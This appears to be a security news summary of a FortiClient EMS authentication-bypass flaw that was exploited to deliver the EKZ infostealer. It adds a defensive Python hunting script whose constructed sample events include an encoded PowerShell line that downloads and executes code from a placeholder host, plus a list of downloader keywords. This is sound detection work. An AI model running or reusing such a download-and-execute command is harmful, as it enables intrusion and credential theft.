Overview
- A critical authentication-bypass bug in FortiClient Endpoint Management Server, tracked as CVE-2026-35616 with a CVSS score of 9.1, allows unauthenticated remote code execution through crafted API requests.
- Thursday's reporting by Arctic Wolf and multiple security outlets detailed live campaigns that abused EMS management features to deliver a fake Fortinet update that installed the EKZ infostealer on managed machines.
- The observed intrusion chain used legitimate FortiClient components: fortitray.exe launched a .cmd script that invoked a Base64-encoded PowerShell payload, which downloaded the EKZ binary and sent stolen data over HTTP to attacker infrastructure.
- Fortinet issued emergency hotfixes for FortiClient EMS 7.4.5 and 7.4.6 in April and plans a permanent fix in 7.4.7, while CISA added CVE-2026-35616 to its KEV list and ordered federal agencies to remediate.
- Defenders are urged to patch immediately, audit EMS admin activity and VPN/Remote Access Profile changes, hunt for indicators such as certificate-authentication errors and fortitray-driven script execution, and, if breached, revoke sessions and change affected credentials.
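The hunting advice above is easier to act on with a concrete rule over process-creation telemetry. The following Python is an added example, not code from Fortinet, Arctic Wolf, or the reporting summarised here: it models two detections for the chain described (a FortiTray.exe parent spawning a script host, and an encoded PowerShell command line whose decoded payload fetches a second stage). The event fields (`parent_image`, `image`, `command_line`) are a hypothetical normalised schema rather than any vendor's log format, the sample events are constructed, and the URL in them is a placeholder.

```python
"""Hunt process-creation events for the fortitray.exe -> .cmd -> encoded
PowerShell -> downloader chain. Schema and samples are constructed for
illustration; adapt the field mapping to your EDR or Sysmon export."""
import base64
import ntpath
import re
from dataclasses import dataclass
from typing import List, Optional


@dataclass(frozen=True)
class ProcessEvent:
    parent_image: str   # full path of the parent process (hypothetical field)
    image: str          # full path of the created process (hypothetical field)
    command_line: str   # command line of the created process (hypothetical field)


@dataclass(frozen=True)
class Finding:
    rule: str
    event: ProcessEvent
    detail: str


# Script hosts that a tray/UI helper has no routine reason to launch.
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe",
                "wscript.exe", "cscript.exe", "mshta.exe"}

# PowerShell accepts any unambiguous prefix of -EncodedCommand; cover the usual ones.
ENCODED_FLAG = re.compile(
    r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)

# Substrings in the decoded script that indicate it retrieves a second stage.
DOWNLOAD_MARKERS = ("downloadstring", "downloadfile", "invoke-webrequest",
                    "iwr ", "net.webclient", "http://", "https://")


def decode_encoded_command(command_line: str) -> Optional[str]:
    """Return the decoded -EncodedCommand payload (PowerShell uses UTF-16LE), or None."""
    m = ENCODED_FLAG.search(command_line)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
    except ValueError:          # binascii.Error is a ValueError subclass
        return None
    return raw.decode("utf-16-le", errors="replace")


def hunt(events: List[ProcessEvent]) -> List[Finding]:
    """Apply both rules to every event and return the findings in event order."""
    findings: List[Finding] = []
    for ev in events:
        parent = ntpath.basename(ev.parent_image).lower()
        child = ntpath.basename(ev.image).lower()
        # Rule 1: the FortiClient tray helper launching a script interpreter.
        if parent == "fortitray.exe" and child in SCRIPT_HOSTS:
            findings.append(Finding("fortitray-spawned-script-host", ev,
                                    f"{parent} -> {child}"))
        # Rule 2: encoded PowerShell whose decoded body downloads something.
        decoded = decode_encoded_command(ev.command_line)
        if decoded is not None:
            hits = [mk for mk in DOWNLOAD_MARKERS if mk in decoded.lower()]
            if hits:
                findings.append(Finding("encoded-powershell-downloader", ev,
                                        f"markers={hits}"))
    return findings


def encode_for_powershell(script: str) -> str:
    """Build an -EncodedCommand argument the way PowerShell expects (UTF-16LE, Base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample telemetry: two benign events and two from the described chain.
SAMPLE_EVENTS = [
    # benign: tray helper launching the FortiClient UI
    ProcessEvent(r"C:\Program Files\Fortinet\FortiClient\FortiTray.exe",
                 r"C:\Program Files\Fortinet\FortiClient\FortiClient.exe",
                 "FortiClient.exe"),
    # suspicious: tray helper launching cmd.exe on a dropped .cmd script
    ProcessEvent(r"C:\Program Files\Fortinet\FortiClient\FortiTray.exe",
                 r"C:\Windows\System32\cmd.exe",
                 r'cmd.exe /c "C:\ProgramData\fortiupdate.cmd"'),
    # suspicious: the .cmd invoking an encoded downloader (URL is a placeholder)
    ProcessEvent(r"C:\Windows\System32\cmd.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe -nop -w hidden -enc " + encode_for_powershell(
                     "IEX (New-Object Net.WebClient).DownloadString("
                     "'http://placeholder.invalid/update')")),
    # benign: encoded PowerShell from an interactive session with no download
    ProcessEvent(r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe -EncodedCommand " + encode_for_powershell("Get-Date")),
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"[{f.rule}] {f.detail} :: {f.event.command_line[:80]}")
```

Running the module against the constructed events yields exactly two findings: the FortiTray-to-cmd.exe launch and the encoded downloader, while the legitimate FortiClient launch and the harmless `Get-Date` command are left alone. Decoding the payload before matching matters because the Base64 form hides the download strings from plain keyword searches; a parent-process rule alone would also miss the second stage, which is spawned by cmd.exe rather than by FortiTray.exe.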